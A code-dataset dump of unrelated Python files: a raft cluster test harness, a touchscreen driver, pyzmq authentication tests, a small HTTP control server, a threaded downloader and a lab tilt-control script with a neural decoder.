source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__init__.py
|
#!/usr/bin/env python3
# Copyright 2018-2020, Wayfair GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import os
import signal
import subprocess
import requests
import simplejson
import websocket
import threading
#
# Simple ( simplistic ) library for driving test scripts
#
def rotate(arr):
return arr[1:] + [arr[0]]
class Cluster():
"""Encapsulates a uring cluster"""
def __init__(self):
self.servers = []
self.clients = []
self.config = None
def configure(self, config_file):
self.config = simplejson.load(open(config_file, 'r'))
ports = []
for node in self.config:
ports = ports + [node['port']]
for node in self.config:
port = node['port']
id = node['id']
us = UringServer()
us.set_node_id(id)
us.set_node_ports(ports)
if id == '1':
us.set_bootstrap(True)
us.reset()
us.start()
self.servers.append(us)
time.sleep(1)
rc = RaftClient()
rc.set_name(f'u{id}')
rc.set_node_id(id)
rc.set_port(port)
rc.set_host("localhost")
self.clients.append(rc)
time.sleep(1)
rc.ws_start()
ports = rotate(ports)
print('{}: {}'.format(id, port))
def adjoin(self):
time.sleep(1)
for node in self.config:
id = node['id']
if id != '1':
print(f'Registering cluster node {id}')
requests.post("http://127.0.0.1:9081/uring/{}".format(id))
class UringServer():
"""Handles interactions with uring (raft) instance."""
def __init__(self):
"""Constructs a new uring (raft) instance."""
self.id = None
self.node_ports = None
self.bootstrap = False
def set_node_id(self, id):
self.id = id
def set_node_ports(self, node_ports):
self.node_ports = node_ports
def set_bootstrap(self, bootstrap):
self.bootstrap = bootstrap
def reset(self):
subprocess.call("rm -rf raft-rocks-{}".format(self.id).split())
def start(self):
endpoint = self.node_ports[0]
peers = self.node_ports[1:]
pwd = os.path.join(os.path.dirname(__file__))
cmd = os.path.join(
pwd, "../target/debug/uring -n -e 127.0.0.1:{} ".format(endpoint))
for peer in peers:
cmd += "-p 127.0.0.1:{} ".format(peer)
if self.bootstrap:
cmd += " -b"
cmd += " -i{}".format(self.id)
cmd += " --http 127.0.0.1:{}".format(endpoint + 1000)
print(cmd)
self.cmd = subprocess.Popen(cmd, cwd='./', shell=True)
print("Started process with id: {}".format(self.cmd.pid))
def pid(self):
return self.cmd.pid
def die(self):
self.cmd.kill()
def synchronized(method):
def f(*args):
self = args[0]
self.mutex.acquire()
try:
return apply(method, args)
finally:
self.mutex.release()
return f
def synchronize(kclazz, names=None):
if type(names) == type(''):
names = names.split()
for (name, method_handle) in kclazz.__dict.items():
if callable(name) and name != '__init__' and (names == None or name in names):
kclazz.__dict__[name] = synchronized(method_handle)
class Synchronizer:
def __init__(self):
self.mutex = threading.RLock()
class ChannelObserver(Synchronizer):
def __init__(self):
self.obs = {}
Synchronizer.__init__(self)
return self
def watch(self, channel, handler):
if channel in self.obs:
self.obs[channel].append(handler)
else:
self.obs[channel] = [handler]
class RaftClient(ChannelObserver):
"""Handles client interactions to raft node."""
def __init__(self):
"""Constructs a new raft client."""
self.name = None
self.node_id = None
self.host = None
self.port = None
self.handlers = {}
self.callbacks = {}
self.ws = None
self.wsc_thread = None
self.hub = ChannelObserver.__init__(self)
self.rid = 0
def on_message(self, message):
as_json = simplejson.loads(message)
if 'rid' in as_json:
for handlers in self.hub.obs['reply']:
handlers(as_json['data'])
if 'channel' in as_json['Msg']:
for handlers in self.hub.obs[as_json['Msg']['channel']]:
handlers(as_json)
return message
def on_error(self, error):
print(error)
return error
def on_close(self):
print("### closed ###")
def ws_start(self):
self.ws = websocket.WebSocketApp(
"ws://{}:{}/uring".format(self.host, self.port),
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
)
self.wsc_thread = threading.Thread(
name='wsc', target=self.ws.run_forever)
self.wsc_thread.setDaemon(True)
self.wsc_thread.start()
def select(self, protocol):
self.ws.send(simplejson.dumps({
"Select": {"rid": self.rid, "protocol": protocol}
}))
self.rid = self.rid + 1
def execute_as(self, protocol, json):
self.ws.send(simplejson.dumps(
{
"As": {
"protocol": protocol,
"cmd": json
}
}
))
def subscribe(self, channel, handler=None):
if not handler is None:
self.hub.watch(channel, handler)
self.ws.send(simplejson.dumps({
"Subscribe": {
"channel": channel
}
}))
def kv_get(self, key):
self.ws.send(simplejson.dumps(self.kv_get_cmd(key)))
def kv_get_cmd(self, key):
rid = self.rid
self.rid = self.rid + 1
return {
"Get": {
"rid": self.rid,
"key": key
}
}
def kv_put(self, key, store):
self.ws.send(simplejson.dumps(self.kv_put_cmd(key, store)))
def kv_put_cmd(self, key, store):
rid = self.rid
self.rid = self.rid + 1
return {
"Put": {
"rid": rid,
"key": key,
"store": store
}
}
def kv_cas(self, key, check, store):
self.ws.send(simplejson.dumps({
"Cas": {
"rid": self.rid,
"key": key,
"check": check,
"store": store
}
}))
self.rid = self.rid + 1
def kv_delete(self, key):
self.ws.send(simplejson.dumps(self.kv_delete_cmd(key)))
def kv_delete_cmd(self, key):
rid = self.rid
self.rid = self.rid + 1
return {
"Delete": {
"rid": rid,
"key": key
}
}
def mring_get_size(self):
self.ws.send(simplejson.dumps({
"GetSize": {
"rid": self.rid
}
}))
self.rid = self.rid + 1
def mring_set_size(self, size):
self.ws.send(simplejson.dumps({
"SetSize": {
"rid": self.rid,
"size": int(size),
}
}))
self.rid = self.rid + 1
def mring_add_node(self, name):
self.ws.send(simplejson.dumps({
"AddNode": {
"rid": self.rid,
"node": name,
}
}))
self.rid = self.rid + 1
def mring_remove_node(self, name):
self.ws.send(simplejson.dumps({
"RemoveNode": {
"rid": self.rid,
"node": name,
}
}))
self.rid = self.rid + 1
def on_open(self):
# FIXME TODO call virtual ws.open channel ...
True
def set_name(self, name):
self.name = name
def set_node_id(self, id):
self.node_id = id
def set_host(self, host):
self.host = host
def set_port(self, port):
self.port = port
def on(self, msg_type, handler):
if msg_type in self.handlers:
raise RuntimeError('Handler for message type ' +
msg_type + ' already registered')
self.handlers[msg_type] = handler
def status(self):
url = "http://{}:{}/status"
headers = {'Content-type': 'application/json'}
response = requests.get(url.format(
self.host, self.port + 1000), headers=headers, timeout=1)
return response
def register(self):
url = "http://{}:{}/uring/{}"
response = requests.post(url.format(
self.host, self.port + 1000, self.node_id))
return response
def get(self, k):
url = "http://{}:{}/kv/{}"
response = requests.get(url.format(self.host, self.port + 1000, k))
return response
def put(self, k, v):
url = "http://{}:{}/kv/{}"
headers = {'Content-type': 'application/json'}
response = requests.post(url.format(
self.host, self.port + 1000, k), v, headers=headers)
return response
def cas(self, k, v):
url = "http://{}:{}/kv/{}/cas"
headers = {'Content-type': 'application/json'}
response = requests.post(url.format(
self.host, self.port + 1000, k), v, headers=headers)
return response
def delete(self, k):
url = "http://{}:{}/kv/{}"
response = requests.delete(url.format(self.host, self.port + 1000, k))
return response
|
test.py
|
import threading
from win10toast import ToastNotifier
import time
lol=5
time_=int(lol)
def no(lo):
to=ToastNotifier()
time.sleep(10)
to.show_toast("helo",duration=lo)
b = threading.Thread(target=no,args=[time_])
b.start()
print("task done")
|
ft5406.py
|
#https://github.com/pimoroni/python-multitouch/blob/master/library/ft5406.py
import glob
import io
import os
import errno
import struct
from collections import namedtuple
import threading
import time
import select
import Queue as queue
TOUCH_X = 0
TOUCH_Y = 1
TouchEvent = namedtuple('TouchEvent', ('timestamp', 'type', 'code', 'value'))
EV_SYN = 0
EV_ABS = 3
ABS_X = 0
ABS_Y = 1
ABS_MT_SLOT = 0x2f # 47 MT slot being modified
ABS_MT_POSITION_X = 0x35 # 53 Center X of multi touch position
ABS_MT_POSITION_Y = 0x36 # 54 Center Y of multi touch position
ABS_MT_TRACKING_ID = 0x39 # 57 Unique ID of initiated contact
TS_PRESS = 1
TS_RELEASE = 0
TS_MOVE = 2
class Touch(object):
def __init__(self, slot, x, y):
self.slot = slot
self._x = x
self._y = y
self.last_x = -1
self.last_y = -1
self._id = -1
self.events = []
self.on_move = None
self.on_press = None
self.on_release = None
@property
def position(self):
return (self.x, self.y)
@property
def last_position(self):
return (self.last_x, self.last_y)
@property
def valid(self):
return self.id > -1
@property
def id(self):
return self._id
@id.setter
def id(self, value):
if value != self._id:
if value == -1 and not TS_RELEASE in self.events:
self.events.append(TS_RELEASE)
elif not TS_PRESS in self.events:
self.events.append(TS_PRESS)
self._id = value
@property
def x(self):
return self._x
@x.setter
def x(self, value):
if value != self._x and not TS_MOVE in self.events:
self.events.append(TS_MOVE)
self.last_x = self._x
self._x = value
@property
def y(self):
return self._y
@y.setter
def y(self, value):
if value != self._y and not TS_MOVE in self.events:
self.events.append(TS_MOVE)
self.last_y = self._y
self._y = value
def handle_events(self):
"""Run outstanding press/release/move events"""
for event in self.events:
if event == TS_MOVE and callable(self.on_move):
self.on_move(event, self)
if event == TS_PRESS and callable(self.on_press):
self.on_press(event, self)
if event == TS_RELEASE and callable(self.on_release):
self.on_release(event, self)
self.events = []
class Touches(list):
@property
def valid(self):
return [touch for touch in self if touch.valid]
class Touchscreen(object):
TOUCHSCREEN_EVDEV_NAME = 'FT5406 memory based driver'
EVENT_FORMAT = str('llHHi')
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)
def __init__(self, device=None):
self._device = self.TOUCHSCREEN_EVDEV_NAME if device is None else device
self._running = False
self._thread = None
self._f_poll = select.poll()
self._f_device = io.open(self._touch_device(), 'rb', self.EVENT_SIZE)
self._f_poll.register(self._f_device, select.POLLIN)
self.position = Touch(0, 0, 0)
self.touches = Touches([Touch(x, 0, 0) for x in range(10)])
self._event_queue = queue.Queue()
self._touch_slot = 0
def _run(self):
self._running = True
while self._running:
self.poll()
#time.sleep(0.0001)
def run(self):
if self._thread is not None:
return
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
if self._thread is None:
return
self._running = False
self._thread.join()
self._thread = None
@property
def _current_touch(self):
return self.touches[self._touch_slot]
def close(self):
self._f_device.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __iter__(self):
pass
def _lazy_read(self):
while self._wait_for_events():
event = self._f_device.read(self.EVENT_SIZE)
if not event:
break
yield event
def _get_pending_events(self):
for event in self._lazy_read():
(tv_sec, tv_usec, type, code, value) = struct.unpack(self.EVENT_FORMAT, event)
self._event_queue.put(TouchEvent(tv_sec + (tv_usec / 1000000), type, code, value))
def _wait_for_events(self, timeout=2):
return self._f_poll.poll(timeout)
def poll(self):
self._get_pending_events()
while not self._event_queue.empty():
event = self._event_queue.get()
self._event_queue.task_done()
if event.type == EV_SYN: # Sync
for touch in self.touches:
touch.handle_events()
return self.touches
if event.type == EV_ABS: # Absolute cursor position
if event.code == ABS_MT_SLOT:
self._touch_slot = event.value
if event.code == ABS_MT_TRACKING_ID:
self._current_touch.id = event.value
if event.code == ABS_MT_POSITION_X:
self._current_touch.x = event.value
if event.code == ABS_MT_POSITION_Y:
self._current_touch.y = event.value
if event.code == ABS_X:
self.position.x = event.value
if event.code == ABS_Y:
self.position.y = event.value
return []
def _touch_device(self):
for evdev in glob.glob("/sys/class/input/event*"):
try:
with io.open(os.path.join(evdev, 'device', 'name'), 'r') as f:
if f.read().strip() == self._device:
return os.path.join('/dev','input',os.path.basename(evdev))
except IOError as e:
if e.errno != errno.ENOENT:
raise
raise RuntimeError('Unable to locate touchscreen device: {}'.format(self._device))
def read(self):
return next(iter(self))
if __name__ == "__main__":
import signal
ts = Touchscreen()
def handle_event(event, touch):
print(["Release","Press","Move"][event],
touch.slot,
touch.x,
touch.y)
for touch in ts.touches:
touch.on_press = handle_event
touch.on_release = handle_event
touch.on_move = handle_event
ts.run()
try:
signal.pause()
except KeyboardInterrupt:
print("Stopping thread...")
ts.stop()
exit()
|
test_security.py
|
"""Test libzmq security (libzmq >= 3.3.0)"""
# -*- coding: utf8 -*-
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import os
from threading import Thread
import zmq
from zmq.tests import (
BaseZMQTestCase, SkipTest, PYPY
)
from zmq.utils import z85
USER = b"admin"
PASS = b"password"
class TestSecurity(BaseZMQTestCase):
def setUp(self):
if zmq.zmq_version_info() < (4,0):
raise SkipTest("security is new in libzmq 4.0")
try:
zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("security requires libzmq to be built with CURVE support")
super(TestSecurity, self).setUp()
def zap_handler(self):
socket = self.context.socket(zmq.REP)
socket.bind("inproc://zeromq.zap.01")
try:
msg = self.recv_multipart(socket)
version, sequence, domain, address, identity, mechanism = msg[:6]
if mechanism == b'PLAIN':
username, password = msg[6:]
elif mechanism == b'CURVE':
key = msg[6]
self.assertEqual(version, b"1.0")
self.assertEqual(identity, b"IDENT")
reply = [version, sequence]
if mechanism == b'CURVE' or \
(mechanism == b'PLAIN' and username == USER and password == PASS) or \
(mechanism == b'NULL'):
reply.extend([
b"200",
b"OK",
b"anonymous",
b"\5Hello\0\0\0\5World",
])
else:
reply.extend([
b"400",
b"Invalid username or password",
b"",
b"",
])
socket.send_multipart(reply)
finally:
socket.close()
def start_zap(self):
self.zap_thread = Thread(target=self.zap_handler)
self.zap_thread.start()
def stop_zap(self):
self.zap_thread.join()
def bounce(self, server, client, test_metadata=True):
msg = [os.urandom(64), os.urandom(64)]
client.send_multipart(msg)
frames = self.recv_multipart(server, copy=False)
recvd = list(map(lambda x: x.bytes, frames))
try:
if test_metadata and not PYPY:
for frame in frames:
self.assertEqual(frame.get('User-Id'), 'anonymous')
self.assertEqual(frame.get('Hello'), 'World')
self.assertEqual(frame['Socket-Type'], 'DEALER')
except zmq.ZMQVersionError:
pass
self.assertEqual(recvd, msg)
server.send_multipart(recvd)
msg2 = self.recv_multipart(client)
self.assertEqual(msg2, msg)
def test_null(self):
"""test NULL (default) security"""
server = self.socket(zmq.DEALER)
client = self.socket(zmq.DEALER)
self.assertEqual(client.MECHANISM, zmq.NULL)
self.assertEqual(server.mechanism, zmq.NULL)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client, False)
def test_plain(self):
"""test PLAIN authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.assertEqual(client.plain_username, b'')
self.assertEqual(client.plain_password, b'')
client.plain_username = USER
client.plain_password = PASS
self.assertEqual(client.getsockopt(zmq.PLAIN_USERNAME), USER)
self.assertEqual(client.getsockopt(zmq.PLAIN_PASSWORD), PASS)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
assert not client.plain_server
assert server.plain_server
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
self.stop_zap()
def skip_plain_inauth(self):
"""test PLAIN failed authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
client.plain_username = USER
client.plain_password = b'incorrect'
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
client.send(b'ping')
server.rcvtimeo = 250
self.assertRaisesErrno(zmq.EAGAIN, server.recv)
self.stop_zap()
def test_keypair(self):
"""test curve_keypair"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
self.assertEqual(type(secret), bytes)
self.assertEqual(type(public), bytes)
self.assertEqual(len(secret), 40)
self.assertEqual(len(public), 40)
# verify that it is indeed Z85
bsecret, bpublic = [ z85.decode(key) for key in (public, secret) ]
self.assertEqual(type(bsecret), bytes)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bsecret), 32)
self.assertEqual(len(bpublic), 32)
def test_curve(self):
"""test CURVE encryption"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
try:
server.curve_server = True
except zmq.ZMQError as e:
# will raise EINVAL if no CURVE support
if e.errno == zmq.EINVAL:
raise SkipTest("CURVE unsupported")
server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()
server.curve_secretkey = server_secret
server.curve_publickey = server_public
client.curve_serverkey = server_public
client.curve_publickey = client_public
client.curve_secretkey = client_secret
self.assertEqual(server.mechanism, zmq.CURVE)
self.assertEqual(client.mechanism, zmq.CURVE)
self.assertEqual(server.get(zmq.CURVE_SERVER), True)
self.assertEqual(client.get(zmq.CURVE_SERVER), False)
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
self.stop_zap()
|
control_http_server.py
|
import http.server
import json
import threading
from .shared_state import shared_state, shared_state_lock, regenerate_data
PORT = 8080
# Binds to all network interfaces by default
# from https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7
# POST to '/' to set parameters:
# {
# "cpu_pause_ms": 100,
# "message_bytes": 20,
# "period_sec": 0.2
# }
# Must pass handler as a CLASS, capture state in closure:
class Handler(http.server.BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
# TODO: should use JSON mime type
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
# print("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
self._set_response()
# self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
body = post_data.decode('utf-8')
# TODO: check JSON mime type
# print("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
# str(self.path), str(self.headers), body)
body_parsed = json.loads(body)
with shared_state_lock:
# Just overwrite, the other thread only reads.
# TODO: validate types.
for key in ['cpu_pause_ms', 'message_bytes', 'period_sec']:
if key in body_parsed:
shared_state['params'][key] = body_parsed[key]
else:
print('missing key in POST data: ' + key)
regenerate_data()
print('new configuration is: ' + str(shared_state['params']))
self._set_response()
self.wfile.write("{'result':'new config applied.'}".encode('utf-8'))
def run_control_server():
http_server_thread = threading.Thread(target=__run)
http_server_thread.start()
def __run():
# with not supported in Python3.5 for the httpd object:
# TODO: migrate to 'with' when ubuntu has 2.6
httpd = http.server.HTTPServer(('', PORT), Handler)
print("HTTP control server listening on :", PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
if __name__ == '__main__':
run_control_server()
|
cli.py
|
"""Console script for threaded_file_downloader."""
import sys
import threading
import requests
import click
import os
def download(url: str, outdir):
bytes_: bytes = requests.get(url).content
filename = url.rsplit("/", 1)[1]
outfile = os.path.join(outdir, filename)
with open(outfile, 'wb') as f:
f.write(bytes_)
@click.command(help="Download a list of urls from a text file (seperated by line)")
@click.argument('input-file')
@click.argument('output-dir')
def main(input_file, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(input_file) as f:
for line in f.readlines():
if line != "":
x = threading.Thread(target=download, args=(line.strip("\n"), output_dir))
x.start()
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
|
TiltControlOnlineDecoderNoLoadCells.py
|
import definitions
from definitions import *
import threading
from threading import Thread
from multiprocessing import *
import numpy as np
import xlwt
import csv
import TestRunwLoadCells
from TestRunwLoadCells import *
import MAPOnlineDecoder
### TO TEST: HOW PAUSE WORKS, CHECK PRINT STATEMENTS ARE CORRECT, WHILE LOOP IS WORKING, EACH TIME.SLEEP IS CHANGED TO A DURATION
##Parameters:0
#Tilt Types: (1, 3, 4, 6)
#make sure that NI-DAQ are not using the lines at the same time, i.e. test panel
#data array for Dev3/port0/line0:7 corresponds to channels going to SI Programmer
# lines([0,1,2,3,4,5,6,7])
#tilt = np.array([IN3,IN4,IN5/cwjog,IN6/ccwjog(Go_5V),Wait_5V,?,?,?])
# Tilts have been edited to work with Si Tilt Program
#BMITiltProgram6b- from Nate B's work (renamed a copy to TiltControl)
##Load Cells
##Transducer 2 (26922)
class StopThread(threading.Thread):
def __init__(self):
self.taskstop = nidaqmx.Task()
self.taskstop.di_channels.add_di_chan("Dev4/port2/line6", line_grouping = LineGrouping.CHAN_PER_LINE)
self.taskstop.start()
def run(self):
stop_time = time.time()
stoppulse = self.taskstop.read(number_of_samples_per_channel = 1)
return stoppulse
def end(self):
self.taskstop.stop()
def LoadCellThread():
Chan_list = ["Dev6/ai18", "Dev6/ai19", "Dev6/ai20", "Dev6/ai21", "Dev6/ai22", "Dev6/ai23","Dev6/ai32", "Dev6/ai33", "Dev6/ai34", "Dev6/ai35", "Dev6/ai36", "Dev6/ai37","Dev6/ai38", "Dev6/ai39", "Dev6/ai48", "Dev6/ai49", "Dev6/ai50", "Dev6/ai51",'Timestamp']
with nidaqmx.Task() as task, nidaqmx.Task() as taskstart:
#######################################################
sheetName = 'CSM001_TILT_SYNCEDLOCAL_72219_LOADCELL'
#######################################################
with open(sheetName + '.csv','w+',newline='') as f:
###Initialize Channels and Variables
task.ai_channels.add_ai_voltage_chan("Dev6/ai18:23,Dev6/ai32:39,Dev6/ai48:51")
### timing to 1000 Hz
task.timing.cfg_samp_clk_timing(1000, sample_mode= AcquisitionType.CONTINUOUS)
###Start Pulse task
taskstart.di_channels.add_di_chan("Dev4/port2/line5", line_grouping = LineGrouping.CHAN_PER_LINE )
taskstart.read(number_of_samples_per_channel=1)
###Initiate Variables
samples = 1000
channels = len(Chan_list) - 1
counter = 0
###Collects data and time
data = [[0 for i in range(samples)] for i in range(channels)]
tic = round(time.time(),3)
#toc = round((time.time()-tic),3)
###Process time
ticsamps = np.linspace(tic,(tic+1),samples)
#ticsamps = np.linspace(toc,(toc+1),samples)
ticsamps = ticsamps.tolist()
data.append(ticsamps)
###
total = samples*len(data)
channelList = np.zeros(total).reshape(len(data),samples)
running = True
writer = csv.writer(f)
wait_start = True
###Wait for Start Pulse
while wait_start == True:
ex = taskstart.read(number_of_samples_per_channel=1)
print(ex)
if ex == True or ex == [True]:
endtiming = 0
taskstart.stop()
wait_start = False
csvrunlogging = True
print('start stop thread')
taskstopthread = StopThread()
print('open csv')
##############Read and Record Continuous Loop
writer = csv.writer(f)
writer.writerow(Chan_list)
print('start')
while running == True:
data = task.read(samples)
if counter ==0:
tic = round(time.time(),3)
counter = counter + 1
else:
tic = tic + 1.001
ticsamps = np.linspace(tic,(tic+1),samples)
ticsamps = ticsamps.tolist()
data.append(ticsamps)
for key in range(len(data)):
for i in range(samples):
channelList[key][i] = data[key][i]
for i in range(samples):
row = [item[i] for item in channelList]
writer.writerow(row)
stahp = taskstopthread.run()
if stahp ==[False]:
running = False
print('done')
task.stop()
taskstopthread.end()
#############End of LoadCells
#####################################################################################################################################################################################################################
#Tilt class beings here
class tiltclass():
def __init__(self):
self.WaterDuration = 0.15
self.punish = np.array([0,1,0,0,0,0,0,0], dtype=np.uint8)
self.reward = np.array([0,1,1,0,0,0,0,0], dtype=np.uint8)
self.start1 = np.array([1,0,0,1,0,0,0,0], dtype=np.uint8)
self.start3 = np.array([1,1,0,1,0,0,0,0], dtype=np.uint8)
self.start4 = np.array([0,0,1,1,0,0,0,0], dtype=np.uint8)
self.start6 = np.array([0,1,1,1,0,0,0,0], dtype=np.uint8)
self.tilt1 = np.array([1,0,0,1,0,0,0,0], dtype=np.uint8)
self.tilt3 = np.array([1,1,0,1,0,0,0,0], dtype=np.uint8)
self.tilt4 = np.array([0,0,1,1,0,0,0,0], dtype=np.uint8)
self.tilt6 = np.array([0,1,1,1,0,0,0,0], dtype=np.uint8)
self.begin = np.array([0,0,0,0,0,0,0,0], dtype=np.uint8)
self.wateron = np.array([0,0,0,0,1,0,0,0], dtype=np.uint8)
#task = Task()
#task.CreateDOChan("/Dev4/port0/line0:7","",PyDAQmx.DAQmx_Val_ChanForAllLines)
#task.StartTask()
#task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
#test = np.array([0,0,0,0,1,1,1,1], dtype=np.uint8)
#testall = np.array([1,1,1,1,1,1,1,1], dtype=np.uint8)
#pseudo-random generator 1,2,3,4
#Task is from PyDAQmx
def tilt(self,i,task,taskinterrupt,tilts,psthclass,client,baseline_recording):
delay = ((randint(1,100))/100)+1.5
#Needs x = choose() as shown below
if int(tilts[i]) == 1:
data = self.tilt1
data2 = self.start1
elif int(tilts[i]) == 2:
data = self.tilt3
data2 = self.start3
elif int(tilts[i]) == 3:
data = self.tilt4
data2 = self.start4
elif int(tilts[i]) == 4:
data = self.tilt6
data2 = self.start6
#Reduce the timestamps in buffer and wait for pretime to add to buffer.
res = client.get_ts()
time.sleep(psthclass.pre_time)
################################################################################################################################################################################################################
#Time dependent section. Will include the client and decode here.
tiltbegintime = time.time()
tiltwaittime = time.time() - tiltbegintime
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data2,None,None)
time.sleep(psthclass.post_time)
# Get accumulated timestamps
res = client.get_ts()
# Print information on the data returned
for t in res: #50ms
# Print information on spike channel 1
if t.Type == PL_SingleWFType and t.Channel in psthclass.channel_dict.keys() and t.Unit in psthclass.channel_dict[t.Channel]:
psthclass.build_unit(t.Channel,t.Unit,t.TimeStamp)
# Print information on events
if t.Type == PL_ExtEventType:
#print(('Event Ts: {}s Ch: {} Type: {}').format(t.TimeStamp, t.Channel, t.Type))
if t.Channel == 257: #Channel for Strobed Events.
psthclass.event(t.TimeStamp, t.Unit)
psthclass.psth()
if baseline_recording == False:
decoderesult = psthclass.decode()
####
if decoderesult == True: #Change statement later for if the decoder is correct.
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.reward,None,None)
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.wateron,None,None)
time.sleep(self.WaterDuration)##### water duration --- can keep this
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
else: ###This will be if decoder is false, have to deal with punishment tilt.
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.punish,None,None)
time.sleep(self.WaterDuration)
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
print('delay')
time.sleep(delay) ############################################# delay--- can keep this
## except KeyboardInterrupt:
## try:
## task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,begin,None,None)
## print('\nPausing... (Hit ENTER to continue, type quit to exit.)')
## response = input()
## if response == 'quit':
## exit()
## print('Resuming...')
## except:
## pass ##Need to check how the loop starts again after pausing like this. Might be ok?
def choose():
#No event 2 and 4 for early training
#because they are the fast tilts and animals take longer to get used to them
a = [1]*100
a.extend([2]*100)
a.extend([3]*100)
a.extend([4]*100)
np.random.shuffle(a)
return a
if __name__ == "__main__":
# Create instance of API class
channel_dict = {8: [2], 9: [1,2], 20: [2], 22: [2,3]} #New Format to compare Channel and Unit. 0 is unsorted. Channels are Dict Keys, Units are in each list.
pre_time = 0.200 #seconds (This value is negative or whatever you put, ex: put 0.200 for -200 ms)
post_time = 0.200 #seconds
bin_size = 0.05 #seconds
baseline_recording = True
psthclass = PSTH(channel_dict, pre_time, post_time, bin_size)
tilter = tiltclass()
if baseline_recording == False:
psthclass.loadtemplate()
##Setup for Plexon DO ########### Maybe will use this later?
# compatible_devices = ['PXI-6224', 'PXI-6259']
# plexdo = PyPlexDO()
# doinfo = plexdo.get_digital_output_info()
# device_number = None
# for i in range(doinfo.num_devices):
# if plexdo.get_device_string(doinfo.device_numbers[i]) in compatible_devices:
# device_number = doinfo.device_numbers[i]
# if device_number == None:
# print("No compatible devices found. Exiting.")
# sys.exit(1)
# else:
# print("{} found as device {}".format(plexdo.get_device_string(device_number), device_number))
# res = plexdo.init_device(device_number)
# if res != 0:
# print("Couldn't initialize device. Exiting.")
# sys.exit(1)
# plexdo.clear_all_bits(device_number)
##End Setup for Plexon DO
client = PyPlexClientTSAPI()
# Connect to OmniPlex Server
client.init_client()
begin = np.array([0,0,0,0,0,0,0,0], dtype=np.uint8)
task = Task()
taskinterrupt = Task()
data = begin
task.CreateDOChan("/Dev4/port0/line0:7","",PyDAQmx.DAQmx_Val_ChanForAllLines)
taskinterrupt.CreateDOChan("/Dev4/port1/line0:7","",PyDAQmx.DAQmx_Val_ChanForAllLines)
task.StartTask()
taskinterrupt.StartTask()
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
## For Testing
## tiltstart = Process(target = tilttest, args = '')
## tiltstart.start()
## tiltstart.join()
## LoadCellThread()
## tiltstart.terminate()
# sensors = Process(target = LoadCellThread, args = '')
# sensors.start()
